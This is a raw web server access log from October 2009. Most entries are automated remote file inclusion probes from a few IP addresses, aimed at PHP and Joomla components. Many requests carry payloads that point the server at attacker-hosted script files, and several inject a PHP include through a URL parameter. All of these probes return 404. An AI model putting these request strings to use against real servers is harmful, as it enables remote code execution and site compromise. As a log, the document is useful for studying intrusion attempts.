67.205.103.171 - - [13/Oct/2009:00:31:12 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:13 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_flyspray/startdown.php?file=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:45 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:45 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:45 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:50 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:50 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:51 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:51 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:52 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:58 -0400] "GET /logs/error_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:31:59 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:00 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:01 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:05 -0400] "GET /logs/error_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:06 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:06 -0400] "GET /logs/error_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:07 -0400] "GET /logs/error_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:14 -0400] "GET /logs/error_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:15 -0400] "GET /logs/error_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:17 -0400] "GET /logs/access_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:18 -0400] "GET /logs/error_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:23 -0400] "GET /logs/error_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:24 -0400] "GET /logs/access_log.Q109092800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:28 -0400] "GET /logs/access_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:28 -0400] "GET /logs/error_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:29 -0400] "GET /logs/access_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:29 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:35 -0400] "GET /logs/error_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:32:38 -0400] "GET /logs//kboard.php?board=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:32:38 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:32:38 -0400] "GET //kboard.php?board=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:45 -0400] "GET /logs/access_log.Q109092800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:45 -0400] "GET /logs/access_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:45 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:32:59 -0400] "GET /logs/access_log.Q109082300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:00 -0400] "GET /logs/access_log.Q109072700%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [13/Oct/2009:00:33:01 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:04 -0400] "GET /logs/access_log.Q109082300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:05 -0400] "GET /logs/access_log.Q109071300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:05 -0400] "GET /logs/error_log.Q109092800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:08 -0400] "GET /logs/access_log.Q109072700%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:08 -0400] "GET /logs/error_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:10 -0400] "GET /logs/access_log.Q109071300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:11 -0400] "GET /logs/error_log.Q109092800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:15 -0400] "GET /logs/error_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:26 -0400] "GET /logs/error_log.Q109071300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:33 -0400] "GET /logs/error_log.Q109071300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:37 -0400] "GET /logs/error_log.Q109072700%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:45 -0400] "GET /logs/error_log.Q109072700%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:50 -0400] "GET /logs/error_log.Q109082300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:33:58 -0400] "GET /logs/error_log.Q109082300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.22.175 - - [13/Oct/2009:00:33:55 -0400] "GET /logs/error_log.Q109090100 HTTP/1.0" 200 3510814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.111.27.143 - - [13/Oct/2009:00:34:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
84.111.27.143 - - [13/Oct/2009:00:34:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
67.205.103.171 - - [13/Oct/2009:00:34:27 -0400] "GET /logs/access_log.Q109071100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:34:28 -0400] "GET /logs/error_log.Q109082800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:34:30 -0400] "GET /logs/access_log.Q109071100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:34:33 -0400] "GET /logs/access_log.Q109082800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Oct/2009:00:34:34 -0400] "GET /logs/error_log.Q109082800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.22.175 - - [13/Oct/2009:00:34:01 -0400] "GET /logs/error_log.Q109090100 HTTP/1.0" 200 3510814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.205.103.171 - - [13/Oct/2009:00:34:42 -0400] "GET /logs/access_log.Q109082800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:00:34:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [13/Oct/2009:00:35:36 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
174.143.3.188 - - [13/Oct/2009:00:35:36 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
174.143.3.188 - - [13/Oct/2009:00:35:36 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [13/Oct/2009:00:35:36 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
125.251.147.194 - - [13/Oct/2009:00:37:06 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:06 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:06 -0400] "GET /logs/access_log.Q109082500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:06 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:06 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:06 -0400] "GET /logs/access_log.Q109082500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:13 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:14 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:24 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:24 -0400] "GET /logs/access_log.Q109082500%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:24 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:25 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:25 -0400] "GET /logs/access_log.Q109082500%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:25 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:26 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:26 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:26 -0400] "GET /logs/access_log.Q109082500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:31 -0400] "GET /logs/access_log.Q109052600//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:33 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:33 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:37:33 -0400] "GET /logs/access_log.Q109082500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
